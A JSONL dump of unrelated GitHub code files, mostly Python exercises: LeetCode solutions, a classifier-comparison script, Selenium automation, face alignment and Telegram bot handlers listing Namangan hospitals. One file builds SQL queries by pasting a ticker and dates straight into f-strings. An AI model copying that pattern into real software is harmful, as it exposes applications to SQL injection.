+{"seq_id":"24232250315","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n '''递归方法,递归镜像左子节点和右子节点,结束条件是节点为根节点 O(n)'''\n if not root:\n return None\n else:\n root.left,root.right=self.mirrorTree(root.right),self.mirrorTree(root.left)\n return root\n #迭代法 每个子节点左右子树交换,然后组合O(n)\n if not root:return None\n #将二叉树中的节点逐层放入队列中,再迭代处理队列中的元素\n stack=[root]\n while stack:\n #每次从队列中拿一个节点,并交换这个节点的左右字数\n node=stack.pop(0)\n node.left, node.right = node.right, node.left\n #若当前节点的左子树不为空,放入队列等待后续处理\n if node.left:stack.append(node.left)\n # 若当前节点的右子树不为空,放入队列等待后续处理\n if node.right:stack.append(node.right)\n #返回处理完的根节点\n return root\n\n\n\n\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/2004/27二叉树的镜像.py","file_name":"27二叉树的镜像.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74683391527","text":"#Provided is a list of data about a store’s inventory where each item in the list represents the name of an item, how much is in stock, and how much it costs. Print out each item in the list with the same formatting, using the .format method (not string concatenation). For example, the first print statment should read The store has 12 shoes, each for 29.99 USD.\ninventory = [\"shoes, 12, 29.99\", \"shirts, 20, 9.99\", \"sweatpants, 25, 15.00\", \"scarves, 13, 7.75\"]\nfor x in inventory:\n #print(x)\n #print(type(x))\n a=x.split(',')\n #print(a)\n item=a[1]\n name=a[0]\n cost=a[2]\n print('The store has{} {}, each for{} USD.'.format(item, name, cost))\n","repo_name":"gammarayburst999/Coursera","sub_path":"Python_Basics/Week_04/question_05.py","file_name":"question_05.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"12906408876","text":"from project_shared import *\n\n\ndef is_table_exist(table_name, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT 1 FROM {table_name} LIMIT 1'\n result = connection.execute(query_string)\n return True if result else False\n except:\n return False\n\n\ndef ticker_lookup(ticker, table_name=QUOTE_TABLE_NAME, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT * FROM {table_name} WHERE ticker = \\'{ticker}\\' LIMIT 1'\n result = connection.execute(query_string)\n return True if result.rowcount > 0 else False\n except:\n return False\n\n\ndef get_quotes_by_ticker(ticker, start_date=None, end_date=None, table_name=QUOTE_TABLE_NAME, engine=engine):\n with engine.connect() as connection:\n try:\n query_string = f'SELECT dateTime, open, high, low, close FROM {table_name} WHERE ticker=\\'{ticker}\\''\n if start_date is not None:\n query_string += f' AND dateTime >= \\'{str(start_date)}\\' '\n if end_date is not None:\n query_string += f' AND dateTime <= \\'{str(end_date)}\\' '\n query_string += f' ORDER BY dateTime ASC'\n result = connection.execute(query_string)\n if result.rowcount > 0:\n # print(\"result.rowcount=\" + str(result.rowcount))\n return result.cursor.fetchall()\n else:\n return None\n except:\n return None\n","repo_name":"wideGenesis/upsilon_one","sub_path":"charter/sql_queries.py","file_name":"sql_queries.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16483205035","text":"import sys\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# for test data set\nfrom sklearn.model_selection import train_test_split\n# for cross-validation\nfrom sklearn.model_selection import cross_val_score\n# for classifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\n# for dimension reduction\nfrom sklearn.feature_selection import SequentialFeatureSelector\n\n\n# for order by desc. return second element for sort\ndef takeAccu(elem):\n return elem[1]\n \n\n# analyze on the input data set using several models \n# data: dataframe of input file\n# type: kNN, RandomForest, DecisionTree, SVM\n# problem: what to classfy\n# dimension_reduction: 'Y' yes, 'No' no\ndef analyze(data, model_type, problem, dimension_reduction = 'N'):\n\n for p in problem:\n # separate data into paramters(x) and a value(y)\n df = data.loc[data[0].isin(p)]\n x=df.iloc[:,1:]\n y=df.iloc[:,0]\n print('Classification problem: {}'.format(p))\n print('\\tPicked data: x {}, y {}\\n'.format(x.shape, y.shape))\n\n\n ###################################\n # dimension reduction\n ###################################\n if dimension_reduction == 'Y':\n x = greedyBackward(model_type, x, y)\n\n ###################################\n # set aside 10% for a test later\n ###################################\n X_train,X_test,y_train,y_test=train_test_split(x,y,test_size=0.1) \n\n ###################################\n # set category hyperparameters for each model\n ###################################\n if model_type == 'kNN':\n categories = ['ball_tree','kd_tree','brute']\n elif model_type == 'RandomForest':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'DecisionTree':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'SVM':\n categories = ['linear','poly','rbf']\n\n\n for category in categories:\n k_scores = []\n hyper_score = []\n k_range = range(1, 11)\n if model_type == 'SVM':\n k_range = [0.001, 0.005, 0.01, 0.05, 0.01, 0.5, 1, 3, 5, 10]\n\n ###################################\n # cross validation to find proper hyper parameter\n ################################### \n for k in k_range:\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=k)\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(criterion=category, max_depth=k)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=k)\n elif model_type == 'SVM':\n model = SVC(kernel=category, C=k)\n\n # do a Cross-validation test\n scores = cross_val_score(model, X_train, y_train, cv=5)\n k_scores.append(scores.mean())\n if True:\n print('Testing: cross-vali, model: {}, category param: {}, number param: {}, score: {}'.format(model_type, category, k, scores.mean()))\n\n hyper_score.append((k, scores.mean()))\n\n ###################################\n # choose best hyperparameter from the hyper value we test above\n # pick the hyper parameter that yeilds the hightest score(or accuracy) \n hyper_score.sort(key=takeAccu, reverse=True)\n bestHyper = hyper_score[0][0]\n\n ###################################\n # test with a final validation set\n ###################################\n start = time.time()\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=bestHyper)\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(criterion=category, max_depth=bestHyper)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=bestHyper) \n elif model_type == 'SVM':\n model = SVC(kernel=category, C=bestHyper)\n\n model.fit(X_train, y_train) \n finalScore = model.score(X_test, y_test)\n end = time.time()\n print('Result : final-vali, model: {}, category param: {}, number param: {}, score: {}, time: {gap:.4f}\\n'.format(model_type, category, bestHyper, finalScore, gap = (end - start)))\n\n ###################################\n # show plot to see clearly\n ###################################\n if True:\n plt.plot(k_range, k_scores) \n plt.title('{} {} - Category param: {}, Reduced: {}'.format(p, model_type, category, dimension_reduction))\n plt.ylabel('Cross-Validated Accuracy')\n if model_type == 'kNN':\n plt.xlabel('Number param: k(how many neighbors)')\n elif model_type == 'RandomForest':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'DecisionTree':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'SVM':\n plt.xlabel('Number param: k(C, Regularization parameter)')\n plt.show()\n\n\n# reduce dimension on the input x, y\n# model_type: 'kNN', 'RandomForest', 'DecisionTree', 'SVM'\n# x,y: input data\n# howmany: how many features do you want to left\ndef greedyBackward(model_type, x, y, howmany = 4):\n print('Greedy Backward is in progress.')\n print('\\tbefore x shape: {}'.format(x.shape))\n\n if model_type == 'kNN':\n model = KNeighborsClassifier()\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(max_depth=5)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(max_depth=8)\n elif model_type == 'SVM':\n model = SVC()\n\n start = time.time()\n sfs = SequentialFeatureSelector(model, direction='backward', n_features_to_select=howmany, cv = 5)\n reduced_x = sfs.fit_transform(x,y)\n end = time.time()\n\n print('\\tafter x shape: {}'.format(reduced_x.shape))\n print('Reduced x: model {}, left features: {}, time: {gap:.4f}\\n'.format(model_type, sfs.get_feature_names_out(), gap = (end - start)))\n\n return reduced_x\n\n\ndef usage(exec_name):\n print('Usage:')\n print('\\tpython %s [arg1] [arg2] [arg3] [arg4]' % (exec_name))\n print('\\targ1: input data file')\n print('\\targ2: choose model. \"kNN\" \"RandomForest\" \"DecisionTree\" \"SVM\" are available')\n print('\\targ3: choose problem. 1:H,K 2:M,Y 3:I,J 4:H,K,M,Y,I,J') \n print('\\targ4: apply dimension reduction. Y,y:yes N,n:no') \n print('\\t\\tGreedy Backward Feature Elimination will be applied')\n print('Example:')\n print('\\tpython %s test.data kNN 1 N' % (exec_name))\n print('\\tpython %s test.data RandomForest 2 Y' % (exec_name))\n print('\\tpython %s test.data DecisionTree 3 N' % (exec_name))\n print('\\tpython %s test.data SVM 4 Y' % (exec_name))\n exit()\n\n\n# check arguments and return arguments\ndef checkarg(argv):\n if len(argv) != 5:\n usage(argv[0])\n else :\n model_type = argv[2]\n problem = argv[3]\n reduction = argv[4].upper()\n\n if not (argv[2] == 'kNN' or argv[2] == 'RandomForest' or argv[2] == 'DecisionTree' or argv[2] == 'SVM'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[2]))\n usage(argv[0])\n\n if not (argv[3] == '1' or argv[3] == '2' or argv[3] == '3' or argv[3] == '4'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[3]))\n usage(argv[0])\n\n if not (argv[4] == 'Y' or argv[4] == 'N'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[4]))\n usage(argv[0])\n \n test_problem = []\n if problem == '1':\n test_problem = [['H','K']]\n elif problem == '2':\n test_problem = [['M','Y']]\n elif problem == '3':\n test_problem = [['I','J']]\n elif problem == '4':\n test_problem = [['H','K','M','Y','I','J']]\n\n return [model_type, test_problem, reduction]\n\n\nif __name__ == '__main__':\n\n # check program parameter\n ret_arg = checkarg(sys.argv)\n model_type = ret_arg[0]\n problem = ret_arg[1]\n reduction = ret_arg[2]\n\n data=pd.read_csv(sys.argv[1],header=None)\n print('Loading data from file [{}]'.format(sys.argv[1]))\n print('\\t Loaded data: {}\\n'.format(data.shape))\n \n analyze(data, model_type, problem, reduction)","repo_name":"kbckbc/washu_fl22_cse514","sub_path":"train_model/dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19111386077","text":"def check_age(users, age):\n count = 0\n for i, user in enumerate(users):\n try:\n user_age = int(user['age'])\n except KeyError:\n print(f'Niepoprawne dane: {user}')\n except ValueError:\n print(f'Niepoprawny wiek: {user}')\n else:\n count += 1 if user_age < age else 0\n finally:\n print(f\"{i} - {user}\")\n return count\n\n\nvalid_data = [{'name': 'Jan', 'age': '10'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_date = [{}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_data2 = [{'name': 'Jan', 'age': 'age'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\n\nprint(check_age(valid_data, 15))\nprint(check_age(invalid_date, 15))\nprint(check_age(invalid_data2, 15))\n","repo_name":"dev-com2020/szkolenie_061222","sub_path":"kod_czwartek/bledy.py","file_name":"bledy.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20670189975","text":"# imagine we are writing a programme for Hospital in python and we need to check his name , if he is a existing patient , age , patient history and assign him to a doctor baseed on his need\n\n\n# taking his name \nname = 'Jhon Smith'\n# If he is a existing patient\nif_existing = False\n\n# age ( int )\n\nage = 20\n\n\n# new patiend?\n\nnew_Patient = True\n\n# patient History\n\n\npatient_History ='Fever , cough Probably Flu'\n\n# assigned Doctor\n\ndoctor = 'Dr. Tahia Rahman'\n\n\n# patient_conclusion = doctor + 'diagnosed that ' + name + age + 'has '+patient_History + 'its Flu' + 'his age is '+age+'and he is a '+new_Patient;","repo_name":"sakibahammed/python-fundamentals","sub_path":"hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4379286413","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nnavegador=webdriver.Chrome()\n\n# abrir a página index (entrar no site da busca jurídica)\nimport os\nimport time\nimport pandas as pd\n\ntabela=pd.read_excel('Processos.xlsx')\nprint(tabela)\n\ncaminho = os.getcwd()\narquivo = caminho + r\"\\index.html\"\n\nnavegador.get(arquivo)\n\nxpathDf='/html/body/div/div/div/a[1]'\nxpathRio='/html/body/div/div/div/a[2]'\nxpathSp='/html/body/div/div/div/a[3]'\nmenu=navegador.find_element(By.XPATH,'/html/body/div/div/button')\n\nfrom selenium.webdriver import ActionChains\n\nfor linha in tabela.index:\n if tabela.loc[linha,'Cidade']=='Distrito Federal':\n item=navegador.find_element(By.XPATH,xpathDf)\n elif tabela.loc[linha,'Cidade']=='Rio de Janeiro':\n item=navegador.find_element(By.XPATH,xpathRio)\n else:\n item=navegador.find_element(By.XPATH,xpathSp)\n ActionChains(navegador).move_to_element(menu).perform()\n time.sleep(2)\n item.click()\n time.sleep(2)\n listaAbas=navegador.window_handles\n\n abaOriginal=navegador.window_handles[0]\n novaAba=navegador.window_handles[1]\n navegador.switch_to.window(novaAba)\n\n try:\n navegador.find_element(By.ID,'nome').send_keys(tabela.loc[linha,'Nome'])\n navegador.find_element(By.ID,'advogado').send_keys(tabela.loc[linha,'Advogado'])\n navegador.find_element(By.ID,'numero').send_keys(tabela.loc[linha,'Processo'])\n navegador.find_element(By.XPATH,'//*[@id=\"formulario\"]/div/button').click()\n except:\n print('Elemento inexistente na aba/pagina atual')\n time.sleep(0.5)\n alerta=navegador.switch_to.alert\n alerta.accept()\n time.sleep(3)\n i=0\n while i<30:\n try:\n alerta=navegador.switch_to.alert\n if \"Processo encontrado com sucesso\" in alerta.text:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Encontrado\"\n else:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Não encontrado\"\n break\n except:\n time.sleep(2)\n i+=1\n \n navegador.close()\n navegador.switch_to.window(abaOriginal)\n\nprint(tabela)\ntabela.to_excel('ProcessosAtualizados.xlsx')\n\n\n\n\n\ntime.sleep(5)","repo_name":"jharbes/hashtagPython","sub_path":"028-automacaoWeb-selenium/26-exercicio-processoConsultaSites/exercicio-processoConsultaSites.py","file_name":"exercicio-processoConsultaSites.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37721284966","text":"import csv\n\n\n\ndef parse_ox_csv(filename):\n result = []\n with open(filename, \"r\") as f:\n reader = csv.reader(f)\n\n # pull of column names\n header = next(reader)\n for row in reader:\n result_row = []\n # pull off row names\n data = row[1:]\n for cell in data:\n try:\n result_row.append(float(cell))\n except ValueError:\n result_row.append(None)\n result.append(result_row)\n return result\n\nif __name__ == \"__main__\":\n\n t1 = parse_ox_csv(\"../resources/testdata/1/raw_data.csv\")\n print(t1[0])\n\n\n","repo_name":"rwalk/rsk","sub_path":"util/oxcsv.py","file_name":"oxcsv.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"19626249346","text":"import sys\r\nimport os\r\n\r\nfrom face_alignment import mtcnn\r\nimport argparse\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport random\r\nfrom datetime import datetime\r\nmtcnn_model = mtcnn.MTCNN(device='cpu', crop_size=(112, 112))\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef add_padding(pil_img, top, right, bottom, left, color=(0,0,0)):\r\n width, height = pil_img.size\r\n new_width = width + right + left\r\n new_height = height + top + bottom\r\n result = Image.new(pil_img.mode, (new_width, new_height), color)\r\n result.paste(pil_img, (left, top))\r\n return result\r\n\r\n\r\ndef get_aligned_face(image_path):\r\n img = cv2.cvtColor(image_path, cv2.COLOR_BGR2RGB) #ada2 ada3\r\n img = Image.fromarray(img)\r\n # find face\r\n try:\r\n bboxes, faces = mtcnn_model.align_multi(img, limit=1)\r\n face = faces[0]\r\n except Exception as e:\r\n face = None\r\n box=None\r\n\r\n if(face != None):\r\n bboxes=list(np.reshape(bboxes,5))\r\n bboxes.pop()\r\n bboxes=[int(x) for x in bboxes ]\r\n a=bboxes.pop(0)\r\n bboxes.append(a)\r\n bboxes=[bboxes]\r\n box = [tuple(x) for x in bboxes]\r\n return face,box\r\n","repo_name":"grmos/Face-Recognition-for-Ar-smart-glasses-with-eye-tracker","sub_path":"face_alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28042167316","text":"import json\n\nwith open(\"all_idioms.json\", 'r', encoding='utf-8') as file:\n idioms = tuple(json.load(file))\n\nunique = []\nfor phrase in idioms:\n dicts = [sem['dictionary'] for sem in phrase['semantics'] if 'dictionary' in sem]\n if len(dicts) == len(set(dicts)) and len(set(dicts)) > 1:\n unique.append(phrase)\n\nprint(len(unique))\n\nwith open('idioms_in_dicts.json', 'w', encoding='utf8') as fp:\n json.dump(unique, fp, ensure_ascii=False, indent=4)\n","repo_name":"katearb/idioms","sub_path":"collection_processing/get_uniques.py","file_name":"get_uniques.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74807876966","text":"from aiogram.dispatcher.filters import Text, Command\nfrom aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove, Message\nfrom loader import dp, bot\nfrom keyboards.default.shahar_shifoxona import shaharShifo\nfrom keyboards.default.menuKeyboard import menuStart\nfrom states.locstates import locstates\nfrom aiogram.dispatcher import FSMContext\n\n@dp.message_handler(text=\"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\", state=\"*\")\nasync def send_agronam(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAODY7PgeEPKVG4N8qJrUvtzKeEr1IkAArHAMRsTBKFJUYd2M-OcX7UBAAMCAAN4AAMtBA'\n \n text = \"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\\n\"\n text += \"Manzil: Go'zal dahasi 4-uy\\n\"\n text += \"Mo'ljal: Go'zal shifoxonasi orqasida\\n Tel: +998 69 237 16 48, +998 69 237 10 43\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"41.00796883587812\", longitude=\" 71.62345267916557\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n \n@dp.message_handler(text=\"NAMANGAN VILOYATINING YUQUMLI KASALLIKLAR SHIFOXONASI\", state=\"*\")\nasync def send_sanoat(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAAFjs-3qLQJdT53wFPYrdcCIfihjvQACr8AxGxMEoUmGWODg3mWa9QEAAwIAA3gAAy0E'\n \n text = \"NAMANGAN VILOYATINING YUQUMLI KASALLIKLAR SHIFOXONASI\\n\"\n text += \"Manzil: K.Otamirzayev ko'chasi 90-uy\\n\"\n text += \"Mo'ljal: Doctor A xususiy klinikasi\\nTel: +998 69 224 73 58, +998 69 224 69 15\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"40.99052274911174\", longitude=\"71.70909736965017\") \n await message.reply_photo(file_id, caption=text)\n await state.finish() \n\n@dp.message_handler(text=\"RESPUBLIKA IXTISOSLASHTIRILGAN AKUSHERLIK VA GINEKOLOGIYA ILMIY - AMALIY TIBBIYOT MARKAZINING NAMANGAN FILIALI\", state=\"*\")\nasync def send_ipa(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAmOz7q-dEpQD7rziz3mm8QGvKNU1AAKuwDEbEwShSeMcnOf57i9tAQADAgADbQADLQQ'\n \n text = \"Respublika Ixtisoslashtirilgan Akusherlik va Ginekologiya Ilmiy-Amaliy Tibbiyot Markazi Namangan Filiali\\n\"\n text += \"Manzil: Boburshox ko'chasi 143A-uy\\n\"\n text += \"Mo'ljal: Yuqumli kasalliklar shifoxonasi\\nTel: +998 69 239 38 03\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 07:00-19:00, tushliksiz\"\n \n await message.answer_location(latitude=\"40.99535848695003\", longitude=\"71.64694200841065\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"NAMANGAN VILOYAT KO'P TARMOQLI TIBBIYOT MARKAZI\", state=\"*\")\nasync def send_hamkor(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIB5WOz7YyBRvHnmhfnFmWBPziix8dfAAKwwDEbEwShSZdycp0AASprrQEAAwIAA3kAAy0E'\n \n text = \"Namangan viloyat ko'p tarmoqli tibbiyot markazi\\n\"\n text += \"Manzil: Nomongoniy ko'chasi 9-uy\\n\"\n text += \"Mo'ljal: Sayhun mehmonxonasi\\nTel: +998 69 226 20 04, +998 69 226 36 00\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00, tushliksiz\"\n \n await message.answer_location(latitude=\"41.00393608604384\", longitude=\"71.66104554126807\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"ANGIOMED\", state=\"*\")\nasync def send_asaka(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAN2Y7PgdVeL6gVp1LM66BEMahkbETwAAqXAMRsTBKFJAAE8C2H-sFFjAQADAgADeAADLQQ'\n \n text = \"ANGIOMED\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: +998 78 888 00 01\\n\"\n text += \"Mo'ljal: Namangan mehmonxonasi, NBU bank oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99625761004835\", longitude=\"71.58655921917563\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Rano medical center\", state=\"*\")\nasync def send_infin(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIByGOz7J_NiUUyyNEZGijae-brSbz1AALNwDEbEwShSZMcdoMKIv1ZAQADAgADeAADLQQ'\n \n text = \"Rano medical center\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: +998 69 232 90 09\\n\"\n text += \"Mo'ljal: Al-mashriq oshxonasi yonida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99639110137484\", longitude=\"71.59026379416488\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"HABIB shifoxonasi\", state=\"*\")\nasync def send_trast(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIB42Oz7YNyr9cAAXVwRA9VTKHU55IVFQACz8AxGxMEoUlaoFyF8S2X-QEAAwIAA3gAAy0E'\n \n text = \"HABIB shifoxonasi\\n\"\n text += \"Manzil: Xotira ko'chasi 5-uy\\nTel: +998 90 555 52 25\\n\"\n text += \"Mo'ljal: 5-oila poliklinasi oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-17:00\"\n \n await message.answer_location(latitude=\"41.00063794372812\", longitude=\"71.61002748966733\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"5-oila poliklinasi\", state=\"*\")\nasync def send_mikro(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIBxmOz69xtmNWu3EjITrxw_2v5-9-GAAKtwDEbEwShSVvGznXCO8VnAQADAgADeQADLQQ'\n \n text = \"5-oila poliklinasi\\n\"\n text += \"Manzil: Xotira ko'chasi 71A, 5A-kichik noxiya \\nTel: +998 69 232 50 71\\n\"\n text += \"Mo'ljal: Koson petak tarafda\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.000552061203145\", longitude=\"71.61042198414846\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Galomed\", state=\"*\")\nasync def send_ipak(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAANzY7PgdNYMb8q8Y-zz2tQDRv9AGJ4AAqTAMRsTBKFJTpIrB-oPCwQBAAMCAANtAAMtBA'\n \n text = \"Galomed\\n\"\n text += \"Manzil: 1-kichik noxiya, Sportchilar ko'chasi \\nTel: +998 95 307 00 70\\n\"\n text += \"Mo'ljal: 56-maktab oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.003701653981\", longitude=\"71.59076202766865\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"\\\"ZZZ\\\" ko'z klinikasi\", state=\"*\")\nasync def send_nbu(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAMcY7PfV-iWrxClRzxhoJeO0c2UUQYAAo3AMRsTBKFJo0KrcOgQjmkBAAMCAAN5AAMtBA'\n \n text = \"\\\"ZZZ\\\" ko'z klinikasi\\n\"\n text += \"Manzil: 2-kichik noxiya \\n\"\n text += \"Mo'ljal: 1-shahar roddom, \\\"Navbahor\\\" stadioni \\nTel: +998 69 232 91 63\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 09:00-16:00, Shanba - 08:00-14:00\"\n \n await message.answer_location(latitude=\"41.000267811219075\", longitude=\"71.58959532489571\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n# @dp.message_handler(text=\"G'ishtli bolnitsa\", state=locstates.hospital)\n# async def send_nbu(message:Message, state=FSMContext):\n \n# file_id = ''\n \n# text = \"G'ishtli bolnitsa\\n\"\n# text += \"Manzil: 2-kichik noxiya\\n\"\n# text += \"Mo'ljal: \\\"ZZZ\\\" ko'z klinikasi oldida\\nTel: +998 -------\"\n# text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-19:00\"\n \n# await message.answer_location(latitude=\"41.000591816121926\", longitude=\"71.5901996191277\") \n# await message.reply_photo(file_id, caption=text)\n# await state.finish()\n\n@dp.message_handler(text=\"👈 Ortga\", state=\"*\")\nasync def back_hos(message:Message, state=FSMContext):\n await message.answer(\"Ortga\", reply_markup=menuStart)\n await state.finish()\n\n","repo_name":"AzimjonNosirov/Bank-Bankomat-Shifoxona-Apteka-DXM-bot","sub_path":"handlers/users/hospitalHandler.py","file_name":"hospitalHandler.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2418418881","text":"# 202203071358\n# https://leetcode-cn.com/problems/letter-case-permutation/\n# 给定一个字符串 s ,通过将字符串 s 中的每个字母转变大小写,我们可以获得一个新的字符串。\n# 返回 所有可能得到的字符串集合 。以 任意顺序返回输出。\n# 例:\n# 输入:s = \"a1b2\"\n# 输出:[\"a1b2\", \"a1B2\", \"A1b2\", \"A1B2\"]\nfrom typing import List\n\n\nclass Solution:\n def letterCasePermutation(self, s: str) -> List[str]:\n res = []\n length = len(s)\n if not length:\n return [\"\"]\n\n def dfs(start, tmp):\n if start == length or len(tmp) == length:\n res.append(tmp)\n return\n if s[start].isdigit():\n dfs(start+1, tmp + s[start])\n elif s[start].islower():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].upper())\n elif s[start].isupper():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].lower())\n\n dfs(0, \"\")\n return res\n\n","repo_name":"alex-1q84/leetcode","sub_path":"python/src/leetcode/begin_algorithm/letter_case_permutation.py","file_name":"letter_case_permutation.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"75293407528","text":"\n'''The break statement'''\n# ‘break’ is used to come out of the loop when encountered. It instructs the program to – Exit the loop now.\n\n'''Example:'''\n\nfor i in range(0, 80):\n\tprint(i)\t#This will print 0, 1, 2 and 3\n\tif i == 3:\n\t\tbreak\n\n\n\n\n# Difference between else and break\nfor i in range(10):\n\tprint(i)\n\tif i==5:\n\t\tbreak\nelse:\n\tprint(\"this is inside else of for\")\t#not printed this hence so you see the loop isnt breaking after exhaustion by loop rather from break used \n","repo_name":"fykaa/Just-Learning-Python","sub_path":"34_break statment.py","file_name":"34_break statment.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
